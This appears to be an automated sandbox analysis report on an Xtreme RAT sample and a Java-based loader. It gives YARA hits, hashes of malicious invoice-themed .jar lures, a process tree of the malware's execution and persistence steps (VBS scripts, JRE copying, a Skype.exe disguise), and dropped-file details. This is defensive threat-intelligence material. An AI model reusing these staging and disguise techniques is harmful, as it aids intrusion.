34.2.iexplore.exe.c80000.2.raw.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
14.1.explorer.exe.1b80000.1.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
14.1.explorer.exe.1b80000.1.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
5.0.svchost.exe.c80000.0.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
5.0.svchost.exe.c80000.0.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
27.0.Server.exe.c80000.1.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
27.0.Server.exe.c80000.1.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
27.0.Server.exe.c80000.0.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
27.0.Server.exe.c80000.0.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
15.0.Server.exe.c80000.2.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
15.0.Server.exe.c80000.2.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
6.2.iexplore.exe.c80000.2.raw.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
6.2.iexplore.exe.c80000.2.raw.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
15.2.Server.exe.c80000.1.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
15.2.Server.exe.c80000.1.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
34.0.iexplore.exe.c80000.0.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
34.0.iexplore.exe.c80000.0.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
15.0.Server.exe.c80000.3.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
15.0.Server.exe.c80000.3.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
5.0.svchost.exe.c80000.0.raw.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
5.0.svchost.exe.c80000.0.raw.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
27.0.Server.exe.c80000.3.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
27.0.Server.exe.c80000.3.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
3.0.server.exe.c80000.3.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
3.0.server.exe.c80000.3.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
34.2.iexplore.exe.c80000.2.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
34.2.iexplore.exe.c80000.2.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
3.0.server.exe.c80000.1.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
3.0.server.exe.c80000.1.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
5.2.svchost.exe.290000.1.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
5.2.svchost.exe.290000.1.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
27.0.Server.exe.c80000.2.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
27.0.Server.exe.c80000.2.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
3.1.server.exe.c80000.0.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
3.1.server.exe.c80000.0.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
5.2.svchost.exe.290000.1.raw.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
5.2.svchost.exe.290000.1.raw.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
6.0.iexplore.exe.c80000.0.raw.unpack	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth
6.0.iexplore.exe.c80000.0.raw.unpack	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll	25New Order.jar	6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493c	malicious	Browse
	49scan_201717067354367.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	73Doc Bidding Tender PO-211411.jar	5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50c	malicious	Browse
	74Profoma Invoice pdf copy.jar	c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510	malicious	Browse
	1TT_COPY_A2017030255.jpg.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	97Payment-pdf.jar	ff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcf	malicious	Browse
	95April PO.jar	1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dc	malicious	Browse
	69AWBRef38304003993.pdf.jar	83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1	malicious	Browse
	98SWIFT.jar	92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5f	malicious	Browse
	93NEW_INVOICE_ORDER_0948776633.jar	14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8	malicious	Browse
	45Inquiry No. (12157) PI from threeway 1214.jar	a6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9f	malicious	Browse
	46Order Specification.jar	c3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31f	malicious	Browse
	77B&L Order No 171022 - Master Mar - MV Northern Juvenile.jar	eaf5d83198b376be7d3b86675a217c497eb57fda69063f2a5dde58dd3bd0ba37	malicious	Browse
	89CV.jar	8acccee38b0c5f38906561ebffea1d3320bfcd1543bea943fa99794d1cd7cc4f	malicious	Browse
	83PO-04217.jar	31c6b4f805747bc91473171f4751ebac8a00bb120901ddbce948f07132b5ef39	malicious	Browse
	179P-39 Oxfam Australia.jar	c7b3b91667badeac5e88133fd1bb9a8b19b116c0ca79a9ed890b30b7b07d8f23	malicious	Browse
	11previous Quotation.jar	8113272d91207f80d3f3f5174cd3e7c6e3ccdc6a8fef6d44cd48442d201873ee	malicious	Browse
	83April Order.jar	cf2af87daa6da31aa30467a8be83273d9e325f6142581142273c378b97d40e17	malicious	Browse
	27TT_COPY_A2017030255.jpg.jar	31d398be8f94446f579bde3cb6873279f22ffba20435b7799cd86d7a5db7e05a	malicious	Browse
	55documents.pdf.jar	b7fb2a1ae8dd7e3dc5594cb02c246e0a6bbae9ec8b3ca0d1355b51f7ea6d0bdf	malicious	Browse
C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll	25New Order.jar	6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493c	malicious	Browse
	49scan_201717067354367.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	73Doc Bidding Tender PO-211411.jar	5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50c	malicious	Browse
	74Profoma Invoice pdf copy.jar	c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510	malicious	Browse
	1TT_COPY_A2017030255.jpg.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	97Payment-pdf.jar	ff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcf	malicious	Browse
	95April PO.jar	1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dc	malicious	Browse
	69AWBRef38304003993.pdf.jar	83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1	malicious	Browse
	98SWIFT.jar	92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5f	malicious	Browse
	93NEW_INVOICE_ORDER_0948776633.jar	14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8	malicious	Browse
	45Inquiry No. (12157) PI from threeway 1214.jar	a6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9f	malicious	Browse
	46Order Specification.jar	c3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31f	malicious	Browse
	77B&L Order No 171022 - Master Mar - MV Northern Juvenile.jar	eaf5d83198b376be7d3b86675a217c497eb57fda69063f2a5dde58dd3bd0ba37	malicious	Browse
	89CV.jar	8acccee38b0c5f38906561ebffea1d3320bfcd1543bea943fa99794d1cd7cc4f	malicious	Browse
	83PO-04217.jar	31c6b4f805747bc91473171f4751ebac8a00bb120901ddbce948f07132b5ef39	malicious	Browse
	179P-39 Oxfam Australia.jar	c7b3b91667badeac5e88133fd1bb9a8b19b116c0ca79a9ed890b30b7b07d8f23	malicious	Browse
	11previous Quotation.jar	8113272d91207f80d3f3f5174cd3e7c6e3ccdc6a8fef6d44cd48442d201873ee	malicious	Browse
	83April Order.jar	cf2af87daa6da31aa30467a8be83273d9e325f6142581142273c378b97d40e17	malicious	Browse
	27TT_COPY_A2017030255.jpg.jar	31d398be8f94446f579bde3cb6873279f22ffba20435b7799cd86d7a5db7e05a	malicious	Browse
	55documents.pdf.jar	b7fb2a1ae8dd7e3dc5594cb02c246e0a6bbae9ec8b3ca0d1355b51f7ea6d0bdf	malicious	Browse
C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll	25New Order.jar	6dd7e4306bf105e9208151b587a99f0e917605d29a752af8adac7b97f041493c	malicious	Browse
	49scan_201717067354367.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	73Doc Bidding Tender PO-211411.jar	5bab68a60dcc1752510997e1e3d9a5cae7be6623ea223c66b5029a598640c50c	malicious	Browse
	74Profoma Invoice pdf copy.jar	c512fd4a2cfeae199fe87b63eb409d657bab16dd54afeb28f56ee0c1f1c38510	malicious	Browse
	1TT_COPY_A2017030255.jpg.jar	0b3346d07b2b5b252a337b25aa2474a6aa3946e1ff40573971130c8106b002bd	malicious	Browse
	97Payment-pdf.jar	ff860260e27631332f95ff653243f05d791208540afeb3e7a46bcb31b6462fcf	malicious	Browse
	95April PO.jar	1b1dcfc915840c54c876591314c50a47bd4b012c1c8a75c49a892f4a9ca813dc	malicious	Browse
	69AWBRef38304003993.pdf.jar	83d655b68632215cd32af6bd6a6b44aec16709daa9e2009b99a60cdb45c333e1	malicious	Browse
	98SWIFT.jar	92797129f3e958c2fbe33387e751185d2ce58aa5ff0baf59a420717b68070d5f	malicious	Browse
	93NEW_INVOICE_ORDER_0948776633.jar	14bb1fdc161af6b58b6bef32f91f065bbffcde6b01c6a5a0dc1b4f6eb433fec8	malicious	Browse
	45Inquiry No. (12157) PI from threeway 1214.jar	a6995b8c377aa017dc8b2775dd50bb986f4b473bd88238ba27f5130c7244bd9f	malicious	Browse
	46Order Specification.jar	c3f6672c76f4c0bf73b12f83b268aa6c371eb3c25673c203a4d1382a6a7cf31f	malicious	Browse
	77B&L Order No 171022 - Master Mar - MV Northern Juvenile.jar	eaf5d83198b376be7d3b86675a217c497eb57fda69063f2a5dde58dd3bd0ba37	malicious	Browse
	89CV.jar	8acccee38b0c5f38906561ebffea1d3320bfcd1543bea943fa99794d1cd7cc4f	malicious	Browse
	83PO-04217.jar	31c6b4f805747bc91473171f4751ebac8a00bb120901ddbce948f07132b5ef39	malicious	Browse
	179P-39 Oxfam Australia.jar	c7b3b91667badeac5e88133fd1bb9a8b19b116c0ca79a9ed890b30b7b07d8f23	malicious	Browse
	11previous Quotation.jar	8113272d91207f80d3f3f5174cd3e7c6e3ccdc6a8fef6d44cd48442d201873ee	malicious	Browse
	83April Order.jar	cf2af87daa6da31aa30467a8be83273d9e325f6142581142273c378b97d40e17	malicious	Browse
	27TT_COPY_A2017030255.jpg.jar	31d398be8f94446f579bde3cb6873279f22ffba20435b7799cd86d7a5db7e05a	malicious	Browse
	55documents.pdf.jar	b7fb2a1ae8dd7e3dc5594cb02c246e0a6bbae9ec8b3ca0d1355b51f7ea6d0bdf	malicious	Browse

Screenshots

Startup

System is w7_1

sxz.exe (PID: 3596 cmdline: 'C:\Users\user\Desktop\sxz.exe' MD5: D87BDA9120DE373AB47FE445B99B6298)

sxz.exe (PID: 3624 cmdline: C:\Users\user\Desktop\sxz.exe MD5: D87BDA9120DE373AB47FE445B99B6298)

server.exe (PID: 3644 cmdline: 'C:\Users\user~1\AppData\Local\Temp\server.exe' MD5: 1BD2D8CA67E8FF5FDCCCFEBE2F8ECD35)

svchost.exe (PID: 3680 cmdline: svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)

Server.exe (PID: 2116 cmdline: 'C:\Windows\InstallDir\Server.exe' MD5: 1BD2D8CA67E8FF5FDCCCFEBE2F8ECD35)

iexplore.exe (PID: 236 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: EE79D654A04333F566DF07EBDE217928)

358saxio.exe (PID: 1832 cmdline: 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe' MD5: E938586EC1F858C38A74F3993A8678D7)

358saxio.exe (PID: 2280 cmdline: C:\Users\user~1\AppData\Local\Temp\358saxio.exe MD5: E938586EC1F858C38A74F3993A8678D7)

iexplore.exe (PID: 3696 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: EE79D654A04333F566DF07EBDE217928)

358saxio.exe (PID: 3884 cmdline: 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe' MD5: E938586EC1F858C38A74F3993A8678D7)

358saxio.exe (PID: 2184 cmdline: C:\Users\user~1\AppData\Local\Temp\358saxio.exe MD5: E938586EC1F858C38A74F3993A8678D7)

javaw.exe (PID: 3668 cmdline: 'C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe' -jar 'C:\Users\user~1\AppData\Local\Temp\uroi.jar' MD5: C731C96456335BDAA2F58220AE25A202)

java.exe (PID: 3832 cmdline: 'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\user~1\AppData\Local\Temp\_0.71076688945376033550400146700531635.class MD5: 6F4EB294ACF731771AFE3EF6F7EE812D)

cmd.exe (PID: 2436 cmdline: cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 2556 cmdline: cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

cmd.exe (PID: 2060 cmdline: cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 2548 cmdline: cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

xcopy.exe (PID: 2212 cmdline: xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e MD5: 361D273773994ED11A6F1E51BBB4277E)

cmd.exe (PID: 2200 cmdline: cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 2104 cmdline: cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

cmd.exe (PID: 2148 cmdline: cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)

cscript.exe (PID: 2452 cmdline: cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)

xcopy.exe (PID: 2240 cmdline: xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e MD5: 361D273773994ED11A6F1E51BBB4277E)

explorer.exe (PID: 3740 cmdline: explorer.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3752 cmdline: explorer.exe C:\Windows\InstallDir\Server.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3804 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3860 cmdline: explorer.exe C:\Windows\InstallDir\Server.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3916 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3960 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

Server.exe (PID: 4032 cmdline: 'C:\Windows\InstallDir\Server.exe' MD5: 1BD2D8CA67E8FF5FDCCCFEBE2F8ECD35)

explorer.exe (PID: 2480 cmdline: explorer.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 2320 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Process:	C:\Windows\InstallDir\Server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes):	489472
Entropy (8bit):	7.877441891914716
Encrypted:	false
MD5:	E938586EC1F858C38A74F3993A8678D7
SHA1:	F02B611AFD56DFC13F78C4AAD04E745C0F25E8C3
SHA-256:	0617FF5E70F5F0D6192D7807BD8E8BA266E0D0C831FCFFCE8F2F154A7C4C3D15
SHA-512:	EAD1E6C794BE979BE3257BC2A5481EA000937208395ACE8E17A1D67F925771D0D447FAC4885FCF606E4403380936B418F2BF7FF6B8C58424EDBDF2B4E287AF87
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%, Browse Antivirus: virustotal, Detection: 48%, Browse
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\358saxio.exe.exe
Process:	C:\Windows\InstallDir\Server.exe
File Type:	data
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
MD5:	A2CE4C7B743725199DA04033B5B57469
SHA1:	1AE348EAFA097AB898941EAFE912D711A407DA10
SHA-256:	0FFF86057DCFB3975C8BC44459740BA5FFB43551931163538DF3F39A6BB991BC
SHA-512:	23BD59F57B16CD496B550C1BBA09EB3F9A9DFE764EA03470E3CC43E4D0B4CA415D239772E4A9B930749E88CEAD9A7EC4B0A77D0DD310E61D8C6521AE6FF278B0
Malicious:	true

C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Process:	C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	281
Entropy (8bit):	5.093300055314051
Encrypted:	false
MD5:	A32C109297ED1CA155598CD295C26611
SHA1:	DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
SHA-256:	45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
SHA-512:	70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%, Browse

C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Process:	C:\Program Files\Java\jre1.8.0_40\bin\java.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	276
Entropy (8bit):	5.064973526456737
Encrypted:	false
MD5:	3BDFD33017806B85949B6FAA7D4B98E4
SHA1:	F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
SHA-256:	9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
SHA-512:	AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%, Browse

C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Process:	C:\Program Files\Java\jre1.8.0_40\bin\java.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	281
Entropy (8bit):	5.093300055314051
Encrypted:	false
MD5:	A32C109297ED1CA155598CD295C26611
SHA1:	DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
SHA-256:	45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
SHA-512:	70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%, Browse

C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Process:	C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	276
Entropy (8bit):	5.064973526456737
Encrypted:	false
MD5:	3BDFD33017806B85949B6FAA7D4B98E4
SHA1:	F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
SHA-256:	9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
SHA-512:	AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%, Browse

C:\Users\user~1\AppData\Local\Temp\_0.71076688945376033550400146700531635.class
Process:	C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe
File Type:	Java Jar file data (zip)
Size (bytes):	247088
Entropy (8bit):	7.977146417027947
Encrypted:	false
MD5:	781FB531354D6F291F1CCAB48DA6D39F
SHA1:	9CE4518EBCB5BE6D1F0B5477FA00C26860FE9A68
SHA-256:	97D585B6AFF62FB4E43E7E6A5F816DCD7A14BE11A88B109A9BA9E8CD4C456EB9
SHA-512:	3E6630F5FEB4A3EB1DAC7E9125CE14B1A2A45D7415CF44CEA42BC51B2A9AA37169EE4A4C36C888C8F2696E7D6E298E2AD7B2F4C22868AAA5948210EB7DB220D8
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\server.exe
Process:	C:\Users\user\Desktop\sxz.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	546304
Entropy (8bit):	7.954817868127675
Encrypted:	false
MD5:	1BD2D8CA67E8FF5FDCCCFEBE2F8ECD35
SHA1:	4BEAF9F98BF3133AAA93FE0935ACC6BBD451BE01
SHA-256:	371797338D6F12D89D9D697B1FCFD35E4DF3410A48812CE3C10C6980553FAEC8
SHA-512:	F0B33DD4EBC81EA946458224DA80884C1766E85F28706032B96E5C4FEECB8FE72BE462B9BA1FD31E1704E0758A135464693023444B3AE57FFB78734DDC3A3832
Malicious:	true
Yara Hits:	Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: C:\Users\user~1\AppData\Local\Temp\server.exe, Author: Florian Roth Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: C:\Users\user~1\AppData\Local\Temp\server.exe, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus:	Antivirus: Avira, Detection: 100%, Browse

C:\Users\user~1\AppData\Local\Temp\uroi.jar
Process:	C:\Users\user\Desktop\sxz.exe
File Type:	Java Jar file data (zip)
Size (bytes):	490811
Entropy (8bit):	7.993050223293411
Encrypted:	true
MD5:	97A01EE483BF0ECEFC0DBE43C626657B
SHA1:	57E5DBE078816B8E82931391300B3AFDF334E3EC
SHA-256:	693115A7758BAD8850BA23A9AC50F9295BD252ED496FB601462C5FD124E66B03
SHA-512:	A542699316E8324C53385BD5B71F7D9EC001D6ACFC0454245BA1EB1A6409BC09B7F94C0868DE0B495011BC2B595EDB7D67B6619795718A1500A172E93AA73A5B
Malicious:	false

C:\Users\user\AppData\Roaming\1760F1\18F4D0.lck
Process:	C:\Users\user\AppData\Local\Temp\358saxio.exe
File Type:	very short file (no magic)
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\4aacbf725e5908a192ccd61db75414d6_041d84af-7e76-450d-8340-55db3c73c359
Process:	C:\Users\user\AppData\Local\Temp\358saxio.exe
File Type:	data
Size (bytes):	6222
Entropy (8bit):	0.9247118256021749
Encrypted:	false
MD5:	E1ADB982DE031D85D7FC815E175435E8
SHA1:	B226EC06B79BB82DC75F0B1A7C493B0AFAE637C0
SHA-256:	81ED51A565D3859C40E9EB27CF59E142294B5F6025353958AD8EFC6974896890
SHA-512:	51C93558F190D43CFD886FD158BFC6A3EDD18614688C89428B9B1AEA8E8DAE404F37AFAE44CE0EB2229ED305A930AC7D2E278FA7EFCAAF324A8482D9EF62C2FF
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\83aa4cc77f591dfc2374580bbd95f6ba_041d84af-7e76-450d-8340-55db3c73c359
Process:	C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe
File Type:	data
Size (bytes):	45
Entropy (8bit):	0.9111711733157262
Encrypted:	false
MD5:	C8366AE350E7019AEFC9D1E6E6A498C6
SHA1:	5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
SHA-256:	11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
SHA-512:	33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Skype.exe
Process:	C:\Users\user\AppData\Local\Temp\358saxio.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes):	489472
Entropy (8bit):	7.877441891914716
Encrypted:	false
MD5:	E938586EC1F858C38A74F3993A8678D7
SHA1:	F02B611AFD56DFC13F78C4AAD04E745C0F25E8C3
SHA-256:	0617FF5E70F5F0D6192D7807BD8E8BA266E0D0C831FCFFCE8F2F154A7C4C3D15
SHA-512:	EAD1E6C794BE979BE3257BC2A5481EA000937208395ACE8E17A1D67F925771D0D447FAC4885FCF606E4403380936B418F2BF7FF6B8C58424EDBDF2B4E287AF87
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%, Browse

C:\Users\user\AppData\Roaming\Microsoft\Skype.exe:Zone.Identifier
Process:	C:\Users\user\Desktop\sxz.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	26
Entropy (8bit):	3.9500637564362093
Encrypted:	false
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Windows\DSma9HnKa.cfg
Process:	C:\Windows\InstallDir\Server.exe
File Type:	data
Size (bytes):	6172
Entropy (8bit):	7.965282828327343
Encrypted:	false
MD5:	C7CF8BA7271EA933927A1F94C164EB6D
SHA1:	E90DC0F3B165B521D5F55D00A1EF1E00509EC241
SHA-256:	C09B89BAFD8622F16E235D74D5F1D9E9A75189D9DF31776C72F304A9646626E8
